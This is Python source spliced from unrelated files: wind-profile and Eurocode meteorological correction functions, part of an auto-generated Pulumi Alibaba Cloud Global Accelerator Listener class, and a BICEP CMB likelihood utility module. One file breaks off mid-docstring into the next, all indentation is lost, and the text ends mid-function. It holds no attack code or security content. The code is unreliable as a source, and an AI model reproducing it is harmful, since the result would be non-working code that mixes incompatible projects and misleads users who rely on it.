dimension is supplied we assume meters per second.
reference_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
The height at which the reference speed is measured,
usually taken to be 10 m in SimScale. If no dimension is supplied
we assume meters.
height : float or np.array().astype(float64) or
pint.quantity.build_quantity_class.<locals>.Quantity
The height(s) at which to return the velocity results; this can
be an array or a single value. If no dimension is supplied
we assume meters.
aerodynamic_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity
The aerodynamic roughness of the ABL profile.
return_without_units : bool
If True, return a plain numpy array stripped of its units (assumed to be
in default SI units); this makes later conversion to other units harder.
debug : bool, optional
Print more detail to the command line; more functionality to
be added later. The default is False.
Returns
-------
omega : np.array().astype(float64) or pint.quantity.build_quantity_class.<locals>.Quantity
The specific turbulence dissipation rate at the specified height or heights.
'''
# return expected dimensional unit types
distance = 1 * unit.meter
distance_type = type(distance)
speed = 1 * unit.meter / unit.second
speed_type = type(speed)
# Check if the inputs have units, if not, assume the units are
# default SI units, i.e. meters for distance, meters/second for speed etc
if not isinstance(reference_speed, speed_type):
reference_speed = reference_speed * speed
if not isinstance(reference_height, distance_type):
reference_height = reference_height * distance
if not isinstance(aerodynamic_roughness, distance_type):
aerodynamic_roughness = aerodynamic_roughness * distance
if not isinstance(height, distance_type):
height = height * distance
if debug:
print(reference_speed)
print(reference_height)
print(aerodynamic_roughness)
print(height)
u_star = calulate_u_star(unit,
reference_speed,
reference_height,
aerodynamic_roughness,
return_without_units=False)
cmu = 0.09  # turbulence model constant (C_mu)
k = 0.41  # von Kármán constant
omega = ((u_star / (k * cmu ** 0.5))
* (1 / (height + aerodynamic_roughness)))
# If a raw numpy array is needed, we can simply ask for the same array
# stripped of its units
if return_without_units:
omega = np.array(omega)
return omega
def omega_AIJ(unit,
u,
tke,
return_without_units=True,
debug=False):
'''
Take height-dependent velocity and turbulent kinetic energy profiles and
return the specific turbulence dissipation rate (omega) at the given height(s).
Parameters
----------
unit : pint.registry.UnitRegistry
A unit registry to do the dimensional calculations.
u : np.array().astype(float64) or pint.quantity.build_quantity_class.<locals>.Quantity
The height-dependent streamwise wind speed.
tke : np.array().astype(float64) or pint.quantity.build_quantity_class.<locals>.Quantity
The height-dependent turbulent kinetic energy.
return_without_units : bool
If True, return a plain numpy array stripped of its units (assumed to be
in default SI units); this makes later conversion to other units harder.
debug : bool, optional
Print more detail to the command line; more functionality to
be added later. The default is False.
Returns
-------
omega : np.array().astype(float64) or pint.quantity.build_quantity_class.<locals>.Quantity
The specific turbulence dissipation rate as a function of height.
'''
# return expected dimensional unit types
speed = 1 * unit.meter / unit.second
speed_type = type(speed)
turbulant_energy = 1 * unit.meter ** 2 / unit.second ** 2
turbulant_energy_type = type(turbulant_energy)
# Check if the inputs have units, if not, assume the units are
# default SI units, i.e. meters for distance, meters/second for speed etc
if not isinstance(u, speed_type):
u = u * speed
if not isinstance(tke, turbulant_energy_type):
tke = tke * turbulant_energy
if debug:
print(u)
print(tke)
cmu = 0.09 # turbulence model constant
velocity_gradient = np.gradient(u)
epsilon = (cmu ** (1 / 2)) * tke * velocity_gradient
omega = epsilon / (cmu * tke)
# If a raw numpy array is needed, we can simply ask for the same array
# stripped of its units
if return_without_units:
omega = np.array(omega)
return omega
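# Hedged usage sketch for omega_AIJ. The profile values below are illustrative
# assumptions, not SimScale defaults; `unit` is a pint.UnitRegistry, as used
# throughout this module:
#
#   import numpy as np
#   import pint
#   unit = pint.UnitRegistry()
#   heights = np.linspace(10.0, 300.0, 30)
#   u = 10.0 * (heights / 10.0) ** 0.14    # streamwise speed, m/s
#   tke = np.full_like(u, 1.5)             # turbulent kinetic energy, m^2/s^2
#   omega = omega_AIJ(unit, u, tke, return_without_units=True)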
def get_eurocode_minimum_height(unit, z0):
# Interpolate the Eurocode (EN 1991-1-4, Table 4.1) minimum height z_min
# for a given aerodynamic roughness z0; the result is returned in the
# original units of z0.
@unit.check('[length]')
def unit_check(z0):
if z0.check('[length]'):
original_unit = z0.units
z0 = z0.to(unit.meter)
z0 = z0.magnitude
return [z0, original_unit]
check = unit_check(z0)
x = [0.003, 0.01, 0.05, 0.3, 1.0]
y = [1, 1, 2, 5, 10]  # z_min values per EN 1991-1-4 Table 4.1
interpolated_value = np.interp(check[0], x, y)
interpolated_value = interpolated_value * unit.meter
interpolated_value = interpolated_value.to(check[1])
return interpolated_value
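# Usage sketch: z0 must carry length units because of the @unit.check
# decorator; the result comes back in the same units as z0:
#
#   z0 = 0.3 * unit.meter
#   z_min = get_eurocode_minimum_height(unit, z0)   # 5 m for terrain category III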
def eurocode_meteo_corrector(unit,
reference_speed,
reference_height,
blend_height,
aerodynamic_roughness,
reference_roughness=0.05,
return_without_units=False):
'''
Take reference values and return the meteorological correction factor.
Parameters
----------
unit : pint.registry.UnitRegistry
A unit registry to do the dimensional calculations.
reference_speed : float or pint.quantity.build_quantity_class.<locals>.Quantity
The reference speed measured at the reference height. If no dimension
is supplied we assume meters per second.
reference_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
The height at which the reference speed is measured, usually taken to
be 10 m in SimScale. If no dimension is supplied we assume meters.
blend_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
Like the reference height, but higher; considered to be the height at
which the local roughness no longer affects the meteorological reading.
aerodynamic_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity
The aerodynamic roughness of the ABL profile.
reference_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
The roughness of the undisturbed boundary layer, not influenced
by local roughness. The default is 0.05.
Returns
-------
corrector : float or pint.quantity.build_quantity_class.<locals>.Quantity
A dimensionless corrector used to correct the meteorological readings.
'''
numerator = (u_eurocode(unit,
reference_speed,
reference_height,
blend_height,
reference_roughness,
return_without_units=return_without_units)
/ reference_speed)
denominator = (u_eurocode(unit,
reference_speed,
reference_height,
blend_height,
aerodynamic_roughness,
return_without_units=return_without_units)
/ reference_speed)
corrector = numerator / denominator
return corrector
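# Hedged usage sketch (the values are illustrative; u_eurocode is defined
# elsewhere in this module and must be available for the call to work):
#
#   corrector = eurocode_meteo_corrector(unit,
#                                        reference_speed=10 * unit.meter / unit.second,
#                                        reference_height=10 * unit.meter,
#                                        blend_height=60 * unit.meter,
#                                        aerodynamic_roughness=0.3 * unit.meter)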
def log_law_meteo_corrector(unit,
reference_speed,
reference_height,
blend_height,
aerodynamic_roughness,
reference_roughness=0.05,
return_without_units=False):
'''
Take reference values and return the meteorological correction factor.
Parameters
----------
unit : pint.registry.UnitRegistry
A unit registry to do the dimensional calculations.
reference_speed : float or pint.quantity.build_quantity_class.<locals>.Quantity
The reference speed measured at the reference height. If no dimension
is supplied we assume meters per second.
reference_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
The height at which the reference speed is measured, usually taken to
be 10 m in SimScale. If no dimension is supplied we assume meters.
blend_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
Like the reference height, but higher; considered to be the height at
which the local roughness no longer affects the meteorological reading.
aerodynamic_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity
The aerodynamic roughness of the ABL profile.
reference_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
The roughness of the undisturbed boundary layer, not influenced
by local roughness. The default is 0.05.
Returns
-------
corrector : float or pint.quantity.build_quantity_class.<locals>.Quantity
A dimensionless corrector used to correct the meteorological readings.
'''
numerator = (u_log_law(unit,
reference_speed,
reference_height,
blend_height,
reference_roughness,
return_without_units=return_without_units)
/ reference_speed)
denominator = (u_log_law(unit,
reference_speed,
reference_height,
blend_height,
aerodynamic_roughness,
return_without_units=return_without_units)
/ reference_speed)
corrector = numerator / denominator
return corrector
def power_law_meteo_corrector(unit,
reference_speed,
reference_height,
blend_height,
alpha,
reference_alpha=0.115,
return_without_units=False):
'''
Take reference values and return the meteorological correction factor.
Parameters
----------
unit : pint.registry.UnitRegistry
A unit registry to do the dimensional calculations.
reference_speed : float or pint.quantity.build_quantity_class.<locals>.Quantity
The reference speed measured at the reference height. If no dimension
is supplied we assume meters per second.
reference_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
The height at which the reference speed is measured, usually taken to
be 10 m in SimScale. If no dimension is supplied we assume meters.
blend_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
Like the reference height, but higher; considered to be the height at
which the local roughness no longer affects the meteorological reading.
alpha : float or pint.quantity.build_quantity_class.<locals>.Quantity
The power-law exponent (alpha) of the ABL profile.
reference_alpha : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
The alpha of the undisturbed boundary layer, not influenced
by local roughness. The default is 0.115.
Returns
-------
corrector : float or pint.quantity.build_quantity_class.<locals>.Quantity
A dimensionless corrector used to correct the meteorological readings.
'''
numerator = (u_power_law(unit,
reference_speed,
reference_height,
blend_height,
reference_alpha,
return_without_units=return_without_units)
/ reference_speed)
denominator = (u_power_law(unit,
reference_speed,
reference_height,
blend_height,
alpha,
return_without_units=return_without_units)
/ reference_speed)
corrector = numerator / denominator
return corrector
def generic_power_law(reference,
reference_z,
exponent,
z):
'''
Parameters
----------
reference : float
A reference value to use in the power law.
reference_z : float
The reference position (e.g. height) at which the reference value applies.
exponent : float
The power-law exponent. Note the sign convention: the function applies
the negative of this exponent, i.e. reference * (z / reference_z) ** -exponent.
z : float or np.array
The position(s) at which to evaluate the power law.
Returns
-------
float or np.array
The power law evaluated at z.
'''
return reference * (z / reference_z) ** -exponent
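# Example (note the sign convention above: the function applies **-exponent,
# so a negative exponent gives the usual increase of wind speed with height):
#
#   u_50 = generic_power_law(10.0, 10.0, -0.14, 50.0)   # ~12.5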
class Error(Exception):
"""Base class for exceptions in this module."""
pass
class OrderError(Error):
"""Exception raised for errors in the input.
Attributes:
expression -- input expression in which the error occurred
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="proxyProtocol")
def proxy_protocol(self) -> Optional[pulumi.Input[bool]]:
"""
The proxy protocol of the listener. Default value is `false`. Valid values:
`true`: preserve the client source IP, so that backend services can see the original client IP address.
`false`: do not preserve the client source IP.
"""
return pulumi.get(self, "proxy_protocol")
@proxy_protocol.setter
def proxy_protocol(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "proxy_protocol", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The status of the listener.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
class Listener(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
accelerator_id: Optional[pulumi.Input[str]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
client_affinity: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy_protocol: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Provides a Global Accelerator (GA) Listener resource.
For information about Global Accelerator (GA) Listener and how to use it, see [What is Listener](https://help.aliyun.com/document_detail/153253.html).
> **NOTE:** Available in v1.111.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_accelerator = alicloud.ga.Accelerator("exampleAccelerator",
duration=1,
auto_use_coupon=True,
spec="1")
de_bandwidth_package = alicloud.ga.BandwidthPackage("deBandwidthPackage",
bandwidth=100,
type="Basic",
bandwidth_type="Basic",
payment_type="PayAsYouGo",
billing_type="PayBy95",
ratio=30)
de_bandwidth_package_attachment = alicloud.ga.BandwidthPackageAttachment("deBandwidthPackageAttachment",
accelerator_id=example_accelerator.id,
bandwidth_package_id=de_bandwidth_package.id)
example_listener = alicloud.ga.Listener("exampleListener",
accelerator_id=example_accelerator.id,
port_ranges=[alicloud.ga.ListenerPortRangeArgs(
from_port=60,
to_port=70,
)],
opts=pulumi.ResourceOptions(depends_on=[de_bandwidth_package_attachment]))
```
## Import
Ga Listener can be imported using the id, e.g.
```sh
$ pulumi import alicloud:ga/listener:Listener example <id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] accelerator_id: The accelerator id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]] certificates: The certificates of the listener.
:param pulumi.Input[str] client_affinity: The clientAffinity of the listener. Default value is `NONE`. Valid values:
`NONE`: client affinity is not maintained, that is, connection requests from the same client cannot always be directed to the same terminal node.
`SOURCE_IP`: maintain client affinity. When a client accesses a stateful application, all requests from the same client can be directed to the same terminal node, regardless of the source port and protocol.
:param pulumi.Input[str] description: The description of the listener.
:param pulumi.Input[str] name: The name of the listener. The name must be 2-128 characters long, start with a letter or a Chinese character, and may contain digits, underscores, and hyphens.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]] port_ranges: The portRanges of the listener.
:param pulumi.Input[str] protocol: The network transport protocol that the listener listens on. Default value is `TCP`. Valid values: `TCP`, `UDP`, `HTTP`, `HTTPS`.
:param pulumi.Input[bool] proxy_protocol: The proxy protocol of the listener. Default value is `false`. Valid values:
`true`: preserve the client source IP, so that backend services can see the original client IP address.
`false`: do not preserve the client source IP.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ListenerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Global Accelerator (GA) Listener resource.
For information about Global Accelerator (GA) Listener and how to use it, see [What is Listener](https://help.aliyun.com/document_detail/153253.html).
> **NOTE:** Available in v1.111.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_accelerator = alicloud.ga.Accelerator("exampleAccelerator",
duration=1,
auto_use_coupon=True,
spec="1")
de_bandwidth_package = alicloud.ga.BandwidthPackage("deBandwidthPackage",
bandwidth=100,
type="Basic",
bandwidth_type="Basic",
payment_type="PayAsYouGo",
billing_type="PayBy95",
ratio=30)
de_bandwidth_package_attachment = alicloud.ga.BandwidthPackageAttachment("deBandwidthPackageAttachment",
accelerator_id=example_accelerator.id,
bandwidth_package_id=de_bandwidth_package.id)
example_listener = alicloud.ga.Listener("exampleListener",
accelerator_id=example_accelerator.id,
port_ranges=[alicloud.ga.ListenerPortRangeArgs(
from_port=60,
to_port=70,
)],
opts=pulumi.ResourceOptions(depends_on=[de_bandwidth_package_attachment]))
```
## Import
Ga Listener can be imported using the id, e.g.
```sh
$ pulumi import alicloud:ga/listener:Listener example <id>
```
:param str resource_name: The name of the resource.
:param ListenerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ListenerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
accelerator_id: Optional[pulumi.Input[str]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
client_affinity: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy_protocol: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ListenerArgs.__new__(ListenerArgs)
if accelerator_id is None and not opts.urn:
raise TypeError("Missing required property 'accelerator_id'")
__props__.__dict__["accelerator_id"] = accelerator_id
__props__.__dict__["certificates"] = certificates
__props__.__dict__["client_affinity"] = client_affinity
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
if port_ranges is None and not opts.urn:
raise TypeError("Missing required property 'port_ranges'")
__props__.__dict__["port_ranges"] = port_ranges
__props__.__dict__["protocol"] = protocol
__props__.__dict__["proxy_protocol"] = proxy_protocol
__props__.__dict__["status"] = None
super(Listener, __self__).__init__(
'alicloud:ga/listener:Listener',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
accelerator_id: Optional[pulumi.Input[str]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
client_affinity: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy_protocol: Optional[pulumi.Input[bool]] = None,
status: Optional[pulumi.Input[str]] = None) -> 'Listener':
"""
Get an existing Listener resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] accelerator_id: The accelerator id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]] certificates: The certificates of the listener.
:param pulumi.Input[str] client_affinity: The clientAffinity of the listener. Default value is `NONE`. Valid values:
`NONE`: client affinity is not maintained, that is, connection requests from the same client cannot always be directed to the same terminal node.
`SOURCE_IP`: maintain client affinity. When a client accesses a stateful application, all requests from the same client can be directed to the same terminal node, regardless of the source port and protocol.
:param pulumi.Input[str] description: The description of the listener.
:param pulumi.Input[str] name: The name of the listener. The name must be 2-128 characters long, start with a letter or a Chinese character, and may contain digits, underscores, and hyphens.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]] port_ranges: The portRanges of the listener.
:param pulumi.Input[str] protocol: The network transport protocol that the listener listens on. Default value is `TCP`. Valid values: `TCP`, `UDP`, `HTTP`, `HTTPS`.
:param pulumi.Input[bool] proxy_protocol: The proxy protocol of the listener. Default value is `false`. Valid values:
`true`: preserve the client source IP, so that backend services can see the original client IP address.
`false`: do not preserve the client source IP.
:param pulumi.Input[str] status: The status of the listener.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ListenerState.__new__(_ListenerState)
__props__.__dict__["accelerator_id"] = accelerator_id
__props__.__dict__["certificates"] = certificates
__props__.__dict__["client_affinity"] = client_affinity
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["port_ranges"] = port_ranges
__props__.__dict__["protocol"] = protocol
__props__.__dict__["proxy_protocol"] = proxy_protocol
__props__.__dict__["status"] = status
return Listener(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="acceleratorId")
def accelerator_id(self) -> pulumi.Output[str]:
"""
The accelerator id.
"""
return pulumi.get(self, "accelerator_id")
@property
@pulumi.getter
def certificates(self) -> pulumi.Output[Optional[Sequence['outputs.ListenerCertificate']]]:
"""
The certificates of the listener.
"""
return pulumi.get(self, "certificates")
@property
@pulumi.getter(name="clientAffinity")
def client_affinity(self) -> pulumi.Output[Optional[str]]:
"""
The clientAffinity of the listener. Default value is `NONE`. Valid values:
`NONE`: client affinity is not maintained, that is, connection requests from the same client cannot always be directed to the same terminal node.
`SOURCE_IP`: maintain client affinity. When a client accesses a stateful application, all requests from the same client can be directed to the same terminal node, regardless of the source port and protocol.
"""
return pulumi.get(self, "client_affinity")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the listener.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the listener. The name must be 2-128 characters long, start with a letter or a Chinese character, and may contain digits, underscores, and hyphens.
# bicep_util.py
#
# This is a module containing subfunctions to evaluate the bicep1 or bicep2 likelihood
#
# get_bpwf
# load_cmbfast
# calc_expvals
# read_data_products_bandpowers
# read_M
# calc_vecp
# g
# vecp
# saveLikelihoodToText
#
#$Id: bicep_util.py,v 1.1.2.5 2014/03/12 18:20:57 dbarkats Exp $ #
# IMPORTANT NOTE: This version was modified by <NAME>, in order to be
# flexible enough to work with a slightly different configuration.
from __future__ import print_function
import os
import numpy as np
from numpy import linalg as LA
from scipy.linalg import sqrtm
import io_mp
# Python 2.x - 3.x compatibility: Always use more efficient range function
try:
xrange
except NameError:
xrange = range
#####################################################################
def get_bpwf(exp='bicep1', root=''):
# This assumes you have the files
# windows/B1_3yr_bpwf_bin[1-9]_20131003.txt in the root directory
# windows/B2_3yr_bpwf_bin[1-9]_date.txt in the working directory if exp = 'bicep2'
if exp == 'bicep1':
# Load up BICEP1 bandpower window functions
file_in = os.path.join("windows", "B1_3yr_bpwf_bin?_20131003.txt")
print("### Reading the BICEP1 BPWF from file: %s" % file_in)
ncol = 580
elif exp == 'bicep2':
# Load up BICEP2 bandpower window functions
file_in = os.path.join("windows", "B2_3yr_bpwf_bin?_20140314.txt")
print("### Reading the BICEP2 BPWF from file: %s" % file_in)
ncol = 599
else:
print('exp must be "bicep1" or "bicep2" to load the proper window functions')
print('window functions must be in the root_directory/windows/')
print('bicep2 window functions available at http://bicepkeck.org/bicep2_2014_release')
print('bicep1 window functions available at bicep.rc.fas.harvard.edu/bicep1_3yr')
raise OSError()
# Initialize array so it's just like our Matlab version
bpwf_Cs_l = np.zeros([ncol, 9, 6])
for i in xrange(9):
window_file = file_in.replace('?', str(i+1))
try:
data = np.loadtxt(
os.path.join(root, window_file))
except OSError:
print("Error reading %s." % window_file +
"Make sure it is in root directory")
raise OSError()
bpwf_Cs_l[:, i, 0] = data[:, 1] # TT -> TT
bpwf_Cs_l[:, i, 1] = data[:, 2] # TE -> TE
bpwf_Cs_l[:, i, 2] = data[:, 3] # EE -> EE
bpwf_Cs_l[:, i, 3] = data[:, 4] # BB -> BB
bpwf_l = data[:, 0]
return (bpwf_l, bpwf_Cs_l)
#####################################################################
def load_cmbfast(file_in):
# Equivalent of load_cmbfast.m but doesn't read .fits for now
# (when it does, may want to change back). Right now we just want
# a simple .txt spectrum with columns
# We want the columns ordered TT TE EE BB TB EB. Note
# that standard CAMB output is TT EE BB TE...
# TB, EB, BT, BE are already zero.
print("### Loading input spectra from file: %s" % file_in)
try:
data = np.loadtxt(file_in)
except OSError:
print("Error reading %s. Make sure it is in working directory" % file_in)
raise
ell = data[:, 0]
# Initialize the Cs_l array
Cs_l = np.zeros([np.shape(data)[0], 9])
Cs_l[:, 0] = data[:, 1] # TT
Cs_l[:, 1] = data[:, 2] # TE
Cs_l[:, 2] = data[:, 3] # EE
Cs_l[:, 3] = data[:, 4] # BB
# Cs_l[:,4] # TB
# Cs_l[:,5] # EB
Cs_l[:, 6] = data[:, 2] # ET
# Cs_l[:,7] # BT
# Cs_l[:,8] = # BE
return (ell, Cs_l)
#####################################################################
def calc_expvals(inpmod_l, inpmod_Cs_l, bpwf_l, bpwf_Cs_l):
# Inputs
# inpmod: theory spectrum loaded by load_cmbfast (l, Cs_l)
# Contents: TT, TE, EE, BB, TB, EB, ET, BT, BE
# bpwf: bandpower window function from reduc_bpwf (l, Cs_l)
# Contents: TT, TP, EE->EE, BB->BB, EE->BB, BB->EE
nbin = np.shape(bpwf_Cs_l)[1]
# Don't assume inpmod and bpwf start at the same ell --
# CAMB spectra like to start at l=0 but bpwf can be higher.
# We do assume that both have delta ell = 1
nl = np.shape(bpwf_Cs_l)[0]
indx = np.arange(0,nl) # Python ranges want one more...
indx = indx + np.nonzero(bpwf_l[0]==inpmod_l)[0][0] # don't subtract 1
# Initialize expval array
expv = np.zeros([nbin,np.shape(bpwf_Cs_l)[2]])
# TT
x = bpwf_Cs_l[:,:,0]*np.transpose(np.tile(inpmod_Cs_l[indx,0],(nbin,1)))
expv[:,0] = np.sum(x,0)
# TE
x = bpwf_Cs_l[:,:,1]*np.transpose(np.tile(inpmod_Cs_l[indx,1],(nbin,1)))
expv[:,1] = np.sum(x,0)
# EE: x1 = EE->EE, x2 = BB->EE
x1 = bpwf_Cs_l[:,:,2]*np.transpose(np.tile(inpmod_Cs_l[indx,2],(nbin,1)))
x2 = bpwf_Cs_l[:,:,5]*np.transpose(np.tile(inpmod_Cs_l[indx,3],(nbin,1)))
expv[:,2] = np.sum(x1,0) + np.sum(x2,0)
# BB: x1 = BB->BB, x2 = EE->BB
x1 = bpwf_Cs_l[:,:,3]*np.transpose(np.tile(inpmod_Cs_l[indx,3],(nbin,1)))
x2 = bpwf_Cs_l[:,:,4]*np.transpose(np.tile(inpmod_Cs_l[indx,2],(nbin,1)))
expv[:,3] = np.sum(x1,0) + np.sum(x2,0)
# expv of TB, EB zero as initialized
return expv
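# Hedged usage sketch for the two loaders above plus calc_expvals. The CAMB
# spectrum file name below is an assumption; any text file with columns
# ell, TT, TE, EE, BB (as expected by load_cmbfast) will do:
#
#   bpwf_l, bpwf_Cs_l = get_bpwf(exp='bicep1', root='.')
#   ell, Cs_l = load_cmbfast('camb_spectrum.txt')
#   expv = calc_expvals(ell, Cs_l, bpwf_l, bpwf_Cs_l)   # 9 bins x 6 spectra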
#####################################################################
# Loads matrices C_fl: fiducial bandpowers (mean of s+n sims).
# C_l_hat: real data bandpowers
# and N_l: Noise bias bandpowers
# outputs them in an array bandpowers[i][j]
# i=0,1,2 for the three bandpower matrices j=0..8 for the 9 'l' bins
def read_data_products_bandpowers(exp='bicep1', root=""):
if exp == 'bicep1':
file_in="B1_3yr_likelihood_bandpowers_20131003.txt"
elif exp == 'bicep2':
file_in="B2_3yr_likelihood_bandpowers_20140314.txt"
else:
print('exp must be "bicep1" or "bicep2" to load the proper files')
raise OSError()
print("### Reading fiducial, real, and noise bias bandpowers from file: %s" % file_in)
values = list()
try:
fin = open(os.path.join(root, file_in), 'r')
except OSError:
print("Error reading %s. Make sure it is in root directory" % file_in)
raise
for line in fin:
if "#" not in line:
lst = line.split(' ')
if len(lst) > 3:
b = []
for elem in lst:
if elem != '':
b.append( float( elem ) )
values.append(b)
bandpowers = []
for i in range(3):
c = list()
for j in range(9):
c.append(values[ i*27 + j * 3: i*27 + j * 3 + 3 ])
bandpowers.append(c)
return bandpowers
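# Usage sketch (assuming the bandpower file sits in the root directory and
# that the three matrix sets are stored in the order listed in the comment
# above -- fiducial, real data, noise bias):
#
#   C_fl, C_l_hat, N_l = read_data_products_bandpowers(exp='bicep1', root='.')
#   # each of the three is a list of nine 3x3 bandpower matrices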
#####################################################################
# Loads the M_cc matrix
# for bicep1 see details as defined in Barkats et al section 9.1
def read_M(exp='bicep1', root=""):
if exp =='bicep1':
file_in = "B1_3yr_bpcm_20131003.txt"
elif exp == 'bicep2':
file_in = "B2_3yr_bpcm_no-sysuncer_20140314.txt"
else:
print('exp must be bicep1 or bicep2 to load the proper files')
raise OSError()
print("### Reading covariance matrix (M_cc) from file: %s" % file_in)
try:
data = np.loadtxt(os.path.join(root, file_in))
except OSError:
print("Error reading %s. Make sure it is in working directory" % file_in)
raise
# HACK because file_in = "B2_3yr_bpcm_no-sysuncer_20140226.txt" has different format
if exp == 'bicep2':
data = data.reshape((54,54))
M_raw = np.array(data)
return M_raw
#####################################################################
# Utility functions used to calculate the likelihood
# for a given l bin.
def calc_vecp(l,C_l_hat,C_fl, C_l):
C_fl_12 = sqrtm(C_fl[l])
C_l_inv = LA.inv(C_l[l])
C_l_inv_12= sqrtm(C_l_inv)
# the order is inverted compared to matlab hamimeche_lewis_likelihood.m line 19
# line 20 of hamimeche_lewis_likelihood.m
res = np.dot(C_l_inv_12, np.dot(C_l_hat[l], C_l_inv_12))
[d, u] = LA.eigh(res)
d = np.diag(d) # noticed that python returns the eigenvalues as a vector, not a matrix
# np.dot(u, np.dot(np.diag(d), LA.inv(u))) should equal res
# real symmetric matrices are diagonalized by orthogonal matrices (M^t M = 1)
# this makes a diagonal matrix by applying g(x) to the eigenvalues, equation 10 in Barkats et al
gd = np.sign(np.diag(d) - 1) * np.sqrt(2 * (np.diag(d) - np.log(np.diag(d)) - 1))
gd = np.diag(gd)
# Argument of vecp in equation 8; multiplying from right to left
X = np.dot(np.transpose(u), C_fl_12)
X = np.dot(gd, X)
X = np.dot(u, X)
X = np.dot(C_fl_12, X)
# This is the vector of equation 7
X = vecp(X)
return X
#def g(x):
# # sign(x-1) \sqrt{ 2(x-ln(x) -1 }
# return np.sign(x-1) * np.sqrt( 2* (x - np.log(x) -1) )
def vecp(mat):
# This returns the unique elements of a symmetric matrix
# 2014-02-11 now mirrors matlab vecp.m
dim = mat.shape[0]
vec = np.zeros((dim*(dim+1)//2))
counter = 0
for iDiag in range(0,dim):
vec[counter:counter+dim-iDiag] = np.diag(mat,iDiag)
counter = counter + dim - iDiag
return vec
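# Quick numeric illustration of vecp (sketch): for a symmetric matrix it returns
# the unique elements, main diagonal first, then each successive upper diagonal.
#
#   m = np.array([[1., 2., 3.],
#                 [2., 4., 5.],
#                 [3., 5., 6.]])
#   vecp(m)   # -> array([1., 4., 6., 2., 5., 3.])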
#####################################################################
# Function to evaluate the likelihood itself
def evaluateLikelihood(C_l,C_l_hat,C_fl,M_inv):
logL = 0
# Calculate X vector (Eq 8) for each l, lp
for l in range(0,9):
